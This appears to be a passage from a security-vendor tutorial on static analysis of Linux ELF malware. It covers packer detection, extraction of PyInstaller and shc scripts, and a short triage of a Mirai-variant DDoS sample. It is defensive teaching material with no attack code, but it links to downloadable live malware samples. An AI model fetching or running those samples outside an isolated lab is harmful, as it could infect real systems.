<p><img loading="lazy" width="1600" height="1125" class="aligncenter size-full wp-image-11722 jetpack-lazy-image" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/19.png" alt data-lazy-srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/19.png 1600w, https://www.intezer.com/wp-content/uploads/2020/08/19-300x211.png 300w, https://www.intezer.com/wp-content/uploads/2020/08/19-1024x720.png 1024w, https://www.intezer.com/wp-content/uploads/2020/08/19-768x540.png 768w, https://www.intezer.com/wp-content/uploads/2020/08/19-1536x1080.png 1536w" data-lazy-sizes="(max-width: 1600px) 100vw, 1600px" data-lazy-src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/19.png?is-pending-load=1" srcset=""><noscript><img loading="lazy" width="1600" height="1125" class="aligncenter size-full wp-image-11722" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/19.png" alt="" srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/19.png 1600w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/19-300x211.png 300w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/19-1024x720.png 1024w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/19-768x540.png 768w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/19-1536x1080.png 1536w " sizes="(max-width: 1600px) 100vw, 1600px" /></noscript></p>
<p>Notice the file now has a <strong>PT_LOAD</strong> segment with RWE flags and the file’s entrypoint is inside this segment (the entrypoint address should fall between the segment’s virtual address and that virtual address plus the segment’s memory size). You can see that the VMprotect section <strong>cat1</strong> is located inside this segment as well.</p>
<p>Run <strong>readelf -S training-sample.vmp.app</strong> to view the file’s sections.</p>
<p><img loading="lazy" width="948" height="149" class="aligncenter size-full wp-image-11723 jetpack-lazy-image" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/20.png" alt data-lazy-srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/20.png 948w, https://www.intezer.com/wp-content/uploads/2020/08/20-300x47.png 300w, https://www.intezer.com/wp-content/uploads/2020/08/20-768x121.png 768w" data-lazy-sizes="(max-width: 948px) 100vw, 948px" data-lazy-src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/20.png?is-pending-load=1" srcset=""><noscript><img loading="lazy" width="948" height="149" class="aligncenter size-full wp-image-11723" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/20.png" alt="" srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/20.png 948w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/20-300x47.png 300w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/20-768x121.png 768w " sizes="(max-width: 948px) 100vw, 948px" /></noscript></p>
<p>VMprotect will create 2 new sections with the same name and suffixes of 1 and 0, respectively. The section names and the RWE segment combined with high entropy can disclose that a file is packed with VMprotect. If a file is packed with VMprotect, we should proceed to dynamic analysis.</p>
<p><u>Note</u>: If you review the symbols, you will see the functions and variables related to the payload no longer appear in the table. This makes sense considering the payload is packed and the file we are analyzing right now is the packer and not the payload.</p>
<p><strong style="font-size: 20px;">Other Packers</strong><br />
There are several open source projects for ELF packers. Here are some examples:<br />
<a href="https://github.com/ps2dev/ps2-packer" target="_blank" rel="noopener noreferrer nofollow">https://github.com/ps2dev/ps2-packer</a><br />
<a href="https://github.com/n4sm/m0dern_p4cker" target="_blank" rel="noopener noreferrer nofollow">https://github.com/n4sm/m0dern_p4cker</a><br />
<a href="https://github.com/timhsutw/elfuck" target="_blank" rel="noopener noreferrer nofollow">https://github.com/timhsutw/elfuck</a></p>
<p><strong>Bottom Line</strong><br />
We suspect a file is packed when it has:</p>
<ol style="color: #627d98;">
<li>Packer code reuse</li>
<li>High entropy</li>
<li>Segment anomalies</li>
<li>Large amounts of gibberish strings</li>
<li>Packer signature such as UPX strings and VMprotect sections names</li>
</ol>
<p>Next steps will be:</p>
<ol style="color: #627d98;">
<li>If there is an unpacking solution, we will unpack the file and analyze it.</li>
<li>If there isn’t an available unpacking solution, we will proceed to dynamic analysis.</li>
</ol>
<p><strong style="font-size: 20px;">Interpreters</strong><br />
Interpreters are programs that compile scripts to an executable. ELF files that were compiled with interpreters hold a compiled script within the binary. Interpreters can also be considered as “script obfuscators”, since the ELF file is just “wrapping” the clear-text source script.</p>
<p>Let’s review two commonly used interpreters:</p>
<ol style="color: #627d98;">
<li><a href="https://www.pyinstaller.org/" target="_blank" rel="noopener noreferrer nofollow">Pyinstaller</a>: Compiles python.</li>
<li><a href="https://github.com/neurobin/shc" target="_blank" rel="noopener noreferrer nofollow">shc</a>: Shell script compiler.</li>
</ol>
<p><strong>Pyinstaller</strong><br />
Files that were compiled with Pyinstaller will have the <strong>pydata</strong> section name. This is where the script’s pyc (compiled python source code) is placed in the ELF binary. Another way to detect Pynistaller binaries is via strings. The interpreter has unique strings such as “Error detected starting Python VM&#8221;. Take a look at this <a href="https://github.com/intezer/ELF-Malware-Analysis-101/blob/master/Part-2-Initial-Analysis/YARA/interpretes.yar" target="_blank" rel="noopener noreferrer nofollow">YARA rule</a>.</p>
<p><a href="https://analyze.intezer.com/files/06ad6831768fb9d04b5cbecce9753bab3be487992936eb82a00d8f77fb4b11bf" target="_blank" rel="noopener noreferrer nofollow">Code reuse</a> is also helpful for detecting Pyinstaller compiled files:</p>
<p><a href="https://analyze.intezer.com/files/06ad6831768fb9d04b5cbecce9753bab3be487992936eb82a00d8f77fb4b11bf" target="_blank" rel="noopener noreferrer nofollow"><img loading="lazy" width="1527" height="526" class="aligncenter size-full wp-image-11724 jetpack-lazy-image" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/21.png" data-slb-group="post-images" alt data-lazy-srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/21.png 1527w, https://www.intezer.com/wp-content/uploads/2020/08/21-300x103.png 300w, https://www.intezer.com/wp-content/uploads/2020/08/21-1024x353.png 1024w, https://www.intezer.com/wp-content/uploads/2020/08/21-768x265.png 768w" data-lazy-sizes="(max-width: 1527px) 100vw, 1527px" data-lazy-src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/21.png?is-pending-load=1" srcset=""><noscript><img loading="lazy" width="1527" height="526" class="aligncenter size-full wp-image-11724" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/21.png" alt="" srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/21.png 1527w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/21-300x103.png 300w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/21-1024x353.png 1024w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/21-768x265.png 768w " sizes="(max-width: 1527px) 100vw, 1527px" /></noscript></a></p>
<p>We can extract the python script from the ELF binary by using <a href="https://github.com/extremecoders-re/pyinstxtractor" target="_blank" rel="noopener noreferrer nofollow">pyinstxtractor</a>. Follow <a href="https://github.com/extremecoders-re/pyinstxtractor/wiki/Extracting-Linux-ELF-binaries" target="_blank" rel="noopener noreferrer nofollow">this guide</a> on how to apply it to ELF files. Note that the python version you use to run <a href="https://github.com/extremecoders-re/pyinstxtractor" target="_blank" rel="noopener noreferrer nofollow">pyinstxtractor</a> should be the same version used in the binary you are analyzing. If there is a mismatch, <a href="https://github.com/extremecoders-re/pyinstxtractor" target="_blank" rel="noopener noreferrer nofollow">pyinstxtractor</a> will issue a warning.</p>
<p>Let’s try it ourselves (<a href="https://github.com/intezer/ELF-Malware-Analysis-101/raw/master/Part-2-Initial-Analysis/Article-samples/test_pyinstaller" target="_blank" rel="noopener noreferrer nofollow">download the compiled file from here</a>):</p>
<p>First, let’s compile a Pyinstaller file:</p>
<ol style="color: #627d98;">
<li>Install Python and Pyinstaller on your VM:<strong>sudo apt update<br />
sudo apt install -y python3<br />
sudo apt install -y python3-pip<br />
sudo pip3 install pyinstaller</strong></li>
</ol>
<ol start="2">
<li style="color: #627d98;">Create a simple Python script named test_pyinstaller.py:<strong>nano test_pyinstaller.py</strong>Copy the following script into test_pyinstaller.py (the print line must be indented under the for loop):<strong>for i in range(1,6):<br />
&nbsp;&nbsp;&nbsp;&nbsp;print(f"this is output #{i}")</strong>And save (ctrl+x).</li>
</ol>
<ol style="color: #627d98;" start="3">
<li>Compile the file with Pyinstaller:<strong>pyinstaller --onefile test_pyinstaller.py</strong>Pyinstaller created 2 directories in the source folder: <strong>dist</strong> and <strong>build</strong>. The compiled file is in the <strong>/dist</strong> directory. You can run the file and also examine the <strong>pydata</strong> section and its strings.<img loading="lazy" width="702" height="164" class="aligncenter size-full wp-image-11725 jetpack-lazy-image" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/22.png" alt data-lazy-srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/22.png 702w, https://www.intezer.com/wp-content/uploads/2020/08/22-300x70.png 300w" data-lazy-sizes="(max-width: 702px) 100vw, 702px" data-lazy-src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/22.png?is-pending-load=1" srcset=""><noscript><img loading="lazy" width="702" height="164" class="aligncenter size-full wp-image-11725" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/22.png" alt="" srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/22.png 702w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/22-300x70.png 300w " sizes="(max-width: 702px) 100vw, 702px" /></noscript><img loading="lazy" width="483" height="192" class="aligncenter size-full wp-image-11726 jetpack-lazy-image" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/23.png" alt data-lazy-srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/23.png 483w, https://www.intezer.com/wp-content/uploads/2020/08/23-300x119.png 300w" data-lazy-sizes="(max-width: 483px) 100vw, 483px" data-lazy-src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/23.png?is-pending-load=1" srcset=""><noscript><img loading="lazy" width="483" height="192" class="aligncenter size-full wp-image-11726" 
src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/23.png" alt="" srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/23.png 483w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/23-300x119.png 300w " sizes="(max-width: 483px) 100vw, 483px" /></noscript></li>
</ol>
<p>Extraction of the python script from the compiled binary:</p>
<ol style="color: #627d98;">
<li>Download <a href="https://github.com/extremecoders-re/pyinstxtractor" target="_blank" rel="noopener noreferrer nofollow">pyinstxtractor</a> and <a href="https://pypi.org/project/uncompyle6/" target="_blank" rel="noopener noreferrer nofollow">uncompyle6</a>:<strong>sudo apt install -y git<br />
git clone https://github.com/extremecoders-re/pyinstxtractor.git<br />
sudo pip3 install uncompyle6</strong></li>
</ol>
<ol style="color: #627d98;" start="2">
<li>Dump the pydata section using objcopy. This section holds the pyc (Python bytecodes). Let’s work in a clean directory.<strong>mkdir training-pyinstaller<br />
cd training-pyinstaller<br />
objcopy --dump-section pydata=pydata.dump ../dist/test_pyinstaller</strong></li>
</ol>
<ol style="color: #627d98;" start="3">
<li>Run pyinstxtractor on the pydata dump:<strong>python3 ../pyinstxtractor/pyinstxtractor.py pydata.dump</strong>You should receive the following output:<img loading="lazy" width="1143" height="328" class="aligncenter size-full wp-image-11727 jetpack-lazy-image" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/24.png" alt data-lazy-srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/24.png 1143w, https://www.intezer.com/wp-content/uploads/2020/08/24-300x86.png 300w, https://www.intezer.com/wp-content/uploads/2020/08/24-1024x294.png 1024w, https://www.intezer.com/wp-content/uploads/2020/08/24-768x220.png 768w" data-lazy-sizes="(max-width: 1143px) 100vw, 1143px" data-lazy-src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/24.png?is-pending-load=1" srcset=""><noscript><img loading="lazy" width="1143" height="328" class="aligncenter size-full wp-image-11727" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/24.png" alt="" srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/24.png 1143w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/24-300x86.png 300w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/24-1024x294.png 1024w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/24-768x220.png 768w " sizes="(max-width: 1143px) 100vw, 1143px" /></noscript>pyinstxtractor created a directory named <strong>pydata.dump_extracted</strong>. Please note that the tool suggests possible entry points (in our example we know it’s <strong>test_pyinstaller.pyc</strong>).</li>
</ol>
<ol start="4">
<li style="color: #627d98;">Decompile the relevant pyc file using uncompyle6. uncompyle6 is a Python decompiler that translates Python bytecode to equivalent Python source code:<strong>cd pydata.dump_extracted<br />
uncompyle6 test_pyinstaller.pyc</strong>We have now successfully extracted the Python code:<img loading="lazy" width="886" height="226" class="aligncenter size-full wp-image-11728 jetpack-lazy-image" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/25.png" alt data-lazy-srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/25.png 886w, https://www.intezer.com/wp-content/uploads/2020/08/25-300x77.png 300w, https://www.intezer.com/wp-content/uploads/2020/08/25-768x196.png 768w" data-lazy-sizes="(max-width: 886px) 100vw, 886px" data-lazy-src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/25.png?is-pending-load=1" srcset=""><noscript><img loading="lazy" width="886" height="226" class="aligncenter size-full wp-image-11728" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/25.png" alt="" srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/25.png 886w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/25-300x77.png 300w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/25-768x196.png 768w " sizes="(max-width: 886px) 100vw, 886px" /></noscript></li>
</ol>
<p><strong>shc</strong><br />
<a href="https://github.com/neurobin/shc" target="_blank" rel="noopener noreferrer nofollow">shc</a> is a shell script compiler. Files that were compiled with shc have specific strings. You can use the <a href="https://github.com/intezer/ELF-Malware-Analysis-101/blob/master/Part-2-Initial-Analysis/YARA/interpretes.yar" target="_blank" rel="noopener noreferrer nofollow">YARA signature</a> to detect them along with code reuse. The <a href="https://github.com/yanncam/UnSHc" target="_blank" rel="noopener noreferrer nofollow">UnSHc</a> tool can be used to extract the compiled bash script from files that were compiled with older shc versions (there currently isn’t a public solution for extracting the script from later versions of this tool).</p>
<p><strong>Bottom Line</strong><br />
We suspect a file is an interpreter when the file has:</p>
<ol style="color: #627d98;">
<li>Interpreter code reuse</li>
<li>High entropy (in some cases)</li>
<li>Interpreter signature such as unique strings and section names</li>
</ol>
<p>Next steps will be:</p>
<ol style="color: #627d98;">
<li>If there is a script extraction solution, we will run it on the binary.</li>
<li>If there isn’t an available script extraction solution, we will proceed to dynamic analysis.</li>
</ol>
<p><strong style="font-size: 20px;">ELFparser Tool</strong><br />
<a href="http://elfparser.com/" target="_blank" rel="noopener noreferrer nofollow">Elfparser</a> is an open source project which as of this publication date hasn&#8217;t been updated in the last few years. With that being said, this tool is useful for initial analysis when you want to search for suspects and indicators of the file&#8217;s functionalities. In addition to parsing the ELF file to its various tables which are relevant for initial analysis, the tool contains embedded signatures based on the file’s static artifacts which are translated to “capabilities”. These capabilities are then translated to a final score. The higher the score, the more suspicious the file is. This score should be taken with slight skepticism, as the indicator is prone to false positives and trusted files can also come up as highly suspicious.</p>
<p>Let’s upload our training file to the ELFparser tool:</p>
<p><img loading="lazy" width="526" height="192" class="aligncenter size-full wp-image-11729 jetpack-lazy-image" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/26.png" alt data-lazy-srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/26.png 526w, https://www.intezer.com/wp-content/uploads/2020/08/26-300x110.png 300w" data-lazy-sizes="(max-width: 526px) 100vw, 526px" data-lazy-src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/26.png?is-pending-load=1" srcset=""><noscript><img loading="lazy" width="526" height="192" class="aligncenter size-full wp-image-11729" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/26.png" alt="" srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/26.png 526w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/26-300x110.png 300w " sizes="(max-width: 526px) 100vw, 526px" /></noscript></p>
<p>It maps the system and popen functions to their relevant categories and recognizes the embedded IP address.</p>
<p><strong style="font-size: 20px;">Real Life Sample Analysis</strong><br />
Now, the moment you have been waiting for. In this section, we will analyze a real ELF malware sample and you will be given 3 additional samples so you can practice initial ELF analysis on your own time. You can find the <a href="https://github.com/intezer/ELF-Malware-Analysis-101/tree/master/Part-2-Initial-Analysis/Real-life-examples/Exercise" target="_blank" rel="noopener noreferrer nofollow">exercise samples here</a>.</p>
<p>Let&#8217;s download this <a href="https://github.com/intezer/ELF-Malware-Analysis-101/raw/master/Part-2-Initial-Analysis/Real-life-examples/Example/8cb7b286f4284afccee5f9b9e2ac143fc954c377ef2891474feccb0b223a9537.sample" target="_blank" rel="noopener noreferrer nofollow">sample</a> and open it with ELFparser so that we can obtain an initial overview of the file.</p>
<p><img loading="lazy" width="703" height="300" class="aligncenter size-full wp-image-11730 jetpack-lazy-image" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/27.png" alt data-lazy-srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/27.png 703w, https://www.intezer.com/wp-content/uploads/2020/08/27-300x128.png 300w" data-lazy-sizes="(max-width: 703px) 100vw, 703px" data-lazy-src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/27.png?is-pending-load=1" srcset=""><noscript><img loading="lazy" width="703" height="300" class="aligncenter size-full wp-image-11730" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/27.png" alt="" srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/27.png 703w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/27-300x128.png 300w " sizes="(max-width: 703px) 100vw, 703px" /></noscript></p>
<p>Elfparser recognizes the file as UPX packed. Let’s unpack the file using <strong>upx -d</strong>.</p>
<p>Now that we have unpacked the file, let’s open it again in ELFparser. You can see that the file has symbols and ELFparser has gathered some capabilities:</p>
<p><img loading="lazy" width="505" height="486" class="aligncenter size-full wp-image-11731 jetpack-lazy-image" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/28.png" alt data-lazy-srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/28.png 505w, https://www.intezer.com/wp-content/uploads/2020/08/28-300x289.png 300w" data-lazy-sizes="(max-width: 505px) 100vw, 505px" data-lazy-src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/28.png?is-pending-load=1" srcset=""><noscript><img loading="lazy" width="505" height="486" class="aligncenter size-full wp-image-11731" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/28.png" alt="" srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/28.png 505w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/28-300x289.png 300w " sizes="(max-width: 505px) 100vw, 505px" /></noscript></p>
<p>The file is likely generating HTTP requests as part of its functionality. The User-Agent and Host header values are filled in at runtime (the %s format specifiers are placeholders).</p>
<p>Let’s run the strings command on the file.</p>
<p>The file contains a large number of strings which look like user agents. We can assume they might be related to the HTTP request identified by ELFparser and that the binary is using different user agents to avoid being blocked by the host that it’s attempting to contact.</p>
<p><img loading="lazy" width="1600" height="698" class="aligncenter size-full wp-image-11732 jetpack-lazy-image" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/29.png" alt data-lazy-srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/29.png 1600w, https://www.intezer.com/wp-content/uploads/2020/08/29-300x131.png 300w, https://www.intezer.com/wp-content/uploads/2020/08/29-1024x447.png 1024w, https://www.intezer.com/wp-content/uploads/2020/08/29-768x335.png 768w, https://www.intezer.com/wp-content/uploads/2020/08/29-1536x670.png 1536w" data-lazy-sizes="(max-width: 1600px) 100vw, 1600px" data-lazy-src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/29.png?is-pending-load=1" srcset=""><noscript><img loading="lazy" width="1600" height="698" class="aligncenter size-full wp-image-11732" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/29.png" alt="" srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/29.png 1600w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/29-300x131.png 300w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/29-1024x447.png 1024w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/29-768x335.png 768w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/29-1536x670.png 1536w " sizes="(max-width: 1600px) 100vw, 1600px" /></noscript></p>
<p>At this point, we may suspect that we are not dealing with a trusted file and that it might also be related to some DDoS malware, but we should gather more information first before making this conclusion.</p>
<p>Let’s look at the file’s symbols. Because it contains many symbols, use readelf and grep each symbol type separately.</p>
<p><strong>readelf -s training-sample | grep FUNC</strong></p>
<p>The file contains some unusual and suspicious function names:<br />
<strong>FindRandIP, tcpFl00d, udpfl00d</strong></p>
<p>We can almost certainly conclude that this file is malware. Let’s do a quick Google search for these unique function names so we can classify the file. We receive search results for Mirai and Gafgyt analysis. It’s now clear that this file is a botnet sample which is a variant of Mirai.</p>
<p><strong style="font-size: 20px;">Golang Files</strong><br />
There is a new trend we are seeing where ELF malware is written in Golang. <a href="https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/" target="_blank" rel="noopener noreferrer nofollow">Kaiji</a>, <a href="https://www.fireeye.com/blog/threat-research/2020/01/vigilante-deploying-mitigation-for-citrix-netscaler-vulnerability-while-maintaining-backdoor.html" target="_blank" rel="noopener noreferrer nofollow">NOTROBIN</a>, and <a href="https://blog.aquasec.com/threat-alert-kinsing-malware-container-vulnerability" target="_blank" rel="noopener noreferrer nofollow">Kinsing</a> are just some examples.</p>
<p>Golang files have a different structure than classic ELF files. We will soon publish an article explaining the ELF Golang format and how to analyze these binaries. Stay tuned!</p>
<p><strong style="font-size: 20px;">Conclusion</strong><br />
We reviewed initial ELF analysis with an emphasis on static analysis. We detailed the different artifacts and components that are relevant for initial analysis and learned how they can help us gather immediate insights about a file. We also explained which tools can be used to gather those insights.</p>
<p>Initial analysis is the first step you should take when approaching a file but it’s not always enough to determine a file’s verdict and classify the threat if it’s malicious. A file can be packed, stripped, or just not informative enough to make an assessment during the initial analysis phase. In part 3, we will review the next step in ELF file analysis: dynamic analysis. You will learn what information can be extracted from this step and which tools can be used to gather it.</p>
<p><a id="contentbanneranalyzefooter" href="https://analyze.intezer.com/create-account?banner=contentbanneranalyzefooter"><img loading="lazy" width="750" height="300" class="aligncenter size-full wp-image-12310 jetpack-lazy-image" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/09/AnalyzeA_750_300.png" data-slb-group="post-images" alt data-lazy-srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/09/AnalyzeA_750_300.png 750w, https://www.intezer.com/wp-content/uploads/2020/09/AnalyzeA_750_300-300x120.png 300w" data-lazy-sizes="(max-width: 750px) 100vw, 750px" data-lazy-src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/09/AnalyzeA_750_300.png?is-pending-load=1" srcset=""><noscript><img loading="lazy" width="750" height="300" class="aligncenter size-full wp-image-12310" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/09/AnalyzeA_750_300.png" alt="" srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/09/AnalyzeA_750_300.png 750w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/09/AnalyzeA_750_300-300x120.png 300w " sizes="(max-width: 750px) 100vw, 750px" /></noscript></a></p>
</div></div><div class="col-md-1"></div></div>
		    </div>
			
		
	    </div>
		

    </div>



    </body>
</html>
